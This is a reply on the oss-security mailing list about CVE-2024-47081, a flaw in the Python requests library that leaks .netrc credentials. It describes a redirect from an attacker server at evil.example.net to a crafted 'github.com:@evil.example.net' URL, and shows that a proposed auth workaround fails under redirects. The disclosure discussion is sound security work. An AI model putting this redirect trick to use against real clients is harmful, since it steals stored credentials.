Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20250604171812.y354hq4gte6omh7e@jwilk.net>
Date: Wed, 4 Jun 2025 19:18:12 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2024-47081: Netrc credential leak in PSF
 requests library

* Alan Coopersmith <alan.coopersmith@...cle.com>, 2025-06-03 10:09:
>I'm not sure how the attacker is supposed to get the victim to make a 
>requests call using a URL the attacker controls

The attacker could set a public HTTP server at 
<http://evil.example.net/> that redirects (via HTTP 302) everything to, 
say, <http://github.com:@evil.example.net>. Then they would only need to 
wait patiently for a visit from a robot that has requests under the 
hood.


* Juho Forsén, 2025-05-31 06:30:
>As a workaround, clients may explicitly specify the credentials used on 
>every API call to disable .netrc access.

I'm not aware of any good way to disable netrc support in requests:
https://github.com/requests/requests/issues/2773

In particular, AFAICT something like 

     requests.get("http://evil.example.net/", auth=("", ""))

(that was alluded by Juho) doesn't help in the presence of redirects. 
The redirected URL would still be fetched with netrc auth.

-- 
Jakub Wilk

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.